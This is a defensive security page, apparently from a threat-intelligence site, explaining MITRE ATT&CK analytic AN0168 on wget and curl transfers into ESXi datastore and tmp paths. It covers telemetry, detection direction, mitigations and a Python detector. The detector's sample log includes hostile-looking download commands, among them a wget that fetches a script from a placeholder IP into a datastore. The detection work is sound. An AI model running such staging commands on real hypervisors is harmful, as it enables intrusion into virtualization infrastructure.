AN0168: Analytic 0168
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.
Analyst context for executives and security teams
This analytic points to a practical ESXi defense question: can the organization see remote file transfers initiated through command-line or vCLI activity when files are written into datastore paths or temporary directories? For leaders, the value is not the specific tool name, but whether virtualization infrastructure has enough logging and response readiness to distinguish legitimate administration from suspicious file staging or transfer behavior.
Executive priority
Prioritize this where ESXi hosts support critical business services. The business risk is visibility: if file transfer activity on hypervisor infrastructure is not logged, retained, and reviewed, incident responders may lack evidence needed to determine what changed, what was staged, and whether virtualization operations are at risk. Security leaders should ask whether ESXi administrative activity, datastore writes, and temporary-directory file creation are included in SOC monitoring and incident evidence requirements.
Technical view
The supplied ATT&CK analytic is limited to ESXi and describes command-line interface or vCLI activity that triggers remote transfer using wget or curl, with files written into datastore paths or local tmp directories. SOC and detection teams should validate whether ESXi command execution, vCLI/API-driven administration, process or shell history where available, and file write activity in datastore and temporary paths are observable. Because no official detection logic or tactic mapping is provided, local baselining is required to separate expected administrative downloads from unusual transfer patterns, unexpected destinations, or writes to sensitive virtualization storage locations.
Likely telemetry
- ESXi host logs related to shell, command-line, or administrative activity
- vCLI or remote administrative session logs
- Evidence of wget or curl execution where collected
- Datastore file creation or modification records where available
- Local temporary directory file write activity
Detection direction
- Confirm that ESXi administrative and command activity is collected centrally; many environments have weaker telemetry on hypervisors than on standard servers.
- Baseline legitimate administrator use of remote transfer utilities and vCLI-driven maintenance to reduce false positives.
- Look for remote transfer activity that writes to datastore paths or local tmp directories, especially when not associated with approved maintenance windows or known administrative accounts.
- Correlate file transfer evidence with ESXi authentication and management-session records to identify the initiating account and source system.
- Treat the absence of official detection logic as a validation gap: detection engineering should test available telemetry before assuming coverage.
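One way to turn the direction above into testable detection logic, as an added example that is not part of the ATT&CK object or of Glexia's analysis: a small Python detector that parses shell-history style lines, tracks the working directory per shell, resolves where wget or curl would write their output, and flags writes under datastore or tmp paths. The log layout (`<timestamp> shell[<pid>]: [<user>]: <command>`), the datastore mount root `/vmfs/volumes`, the sample hosts and the `approved_hosts` baseline set are all assumptions constructed for this example and should be replaced with what your own ESXi telemetry actually emits.

```python
"""Toy detector for the behaviour described in AN0168: wget/curl launched from
an ESXi shell writing into datastore or tmp paths.

Added example, not code from the ATT&CK object or from Glexia. Assumptions not
taken from the page: log lines follow the constructed layout
"<timestamp> shell[<pid>]: [<user>]: <command>", datastores are mounted under
/vmfs/volumes, and all hosts/paths below are placeholders.
"""
import posixpath
import re
import shlex
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional
from urllib.parse import urlparse

# Constructed sample log; hostnames use .invalid and TEST-NET-2 addresses.
SAMPLE_LOG = """\
2026-01-14T09:02:11Z shell[2201]: [admin]: esxcli system version get
2026-01-14T09:05:40Z shell[2201]: [admin]: wget -O /tmp/agent.bin http://updates.example.invalid/agent.bin
2026-01-14T09:06:02Z shell[2201]: [admin]: curl -o /vmfs/volumes/datastore1/tools/patch.vib https://patch.example.invalid/patch.vib
2026-01-14T09:07:15Z shell[2201]: [admin]: curl -s https://status.example.invalid/health
2026-01-14T22:41:09Z shell[3177]: [svc-backup]: cd /vmfs/volumes/datastore1/ && wget http://198.51.100.7:8080/x.sh
2026-01-14T22:41:30Z shell[3177]: [svc-backup]: ls -la /tmp
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
SENSITIVE_ROOTS = ("/vmfs/volumes", "/tmp")  # assumed datastore mount root and local tmp


@dataclass
class Finding:
    ts: str
    user: str
    tool: str
    url: Optional[str]
    dest: str


def _resolve(path: str, cwd: Optional[str]) -> str:
    """Make a destination absolute using the tracked working directory."""
    if not path.startswith("/") and cwd:
        path = posixpath.join(cwd, path)
    return posixpath.normpath(path)


def _destination(tool: str, argv: List[str], cwd: Optional[str]) -> Optional[str]:
    """Path the tool writes the download to; None if it only writes stdout or
    the working directory is unknown from the available telemetry."""
    for i, tok in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if tool == "wget":
            if tok == "-O" and nxt:                               # explicit output file
                return _resolve(nxt, cwd)
            if tok.startswith("--output-document="):
                return _resolve(tok.split("=", 1)[1], cwd)
            if tok in ("-P", "--directory-prefix") and nxt:       # explicit directory
                return _resolve(nxt, cwd)
        else:  # curl
            if tok in ("-o", "--output") and nxt:
                return _resolve(nxt, cwd)
            if tok in ("-O", "--remote-name"):                    # remote name, saved in cwd
                return _resolve(".", cwd) if cwd else None
            if tok == "--output-dir" and nxt:
                return _resolve(nxt, cwd)
    if tool == "wget":  # wget saves into the working directory by default
        return _resolve(".", cwd) if cwd else None
    return None         # curl without -o/-O streams to stdout: no file write


def _in_sensitive_root(dest: str) -> bool:
    return any(dest == r or dest.startswith(r + "/") for r in SENSITIVE_ROOTS)


def detect(log_text: str, approved_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Return transfers from non-approved hosts that write under a sensitive root."""
    cwd_by_pid: Dict[str, Optional[str]] = {}
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid = m["pid"]
        # Examine each simple command of a chained line ("cd X && wget ...") separately.
        for segment in re.split(r"&&|\|\||;|\|", m["cmd"]):
            try:
                argv = shlex.split(segment)
            except ValueError:
                continue
            if not argv:
                continue
            tool = posixpath.basename(argv[0])
            if tool == "cd" and len(argv) > 1:
                cwd_by_pid[pid] = _resolve(argv[1], cwd_by_pid.get(pid))
                continue
            if tool not in ("wget", "curl"):
                continue
            url = next((a for a in argv[1:] if "://" in a), None)
            host = urlparse(url).hostname if url else None
            if host in approved_hosts:
                continue  # baselined maintenance source; tune per environment
            dest = _destination(tool, argv[1:], cwd_by_pid.get(pid))
            if dest and _in_sensitive_root(dest):
                findings.append(Finding(m["ts"], m["user"], tool, url, dest))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.ts} user={f.user} {f.tool} {f.url} -> {f.dest}")
```

Run against the constructed sample, the detector reports three writes (two by `admin` to an explicit `/tmp` file and a datastore path, one by `svc-backup` whose wget inherits the datastore working directory from a preceding `cd`), while the `curl -s` health check is ignored because it writes nothing to disk. Passing the two maintenance hosts as `approved_hosts` leaves only the out-of-hours download from an unrecognised address, which is the baselining step the direction above calls for.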
Mitigation priorities
- Restrict ESXi administrative access to authorized users and managed administration paths.
- Limit or govern shell/vCLI usage according to operational need and change-control expectations.
- Centralize and retain ESXi management, authentication, and relevant file activity logs for incident response.
- Define approved maintenance workflows for downloading or staging files on ESXi hosts and datastores.
- Review monitoring coverage for datastore and temporary-directory writes on virtualization infrastructure.
Analyst notes and limits
This object is a detection analytic, not an ATT&CK technique. The supplied fields identify ESXi as the platform and describe remote transfer through CLI or vCLI using wget or curl with writes into datastore or tmp paths. No ATT&CK tactics, procedure examples, relationships, or official detection logic were supplied, so this take focuses on defensive validation and evidence readiness rather than asserting malicious intent.
The source provides a short description only. It does not specify detection query logic, required data sources, false-positive examples, related techniques, threat groups, campaigns, or observed exploitation. Local ESXi configuration, logging settings, administrative practices, and retention determine whether this behavior can be reliably detected.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 799e8d023401… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0168 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.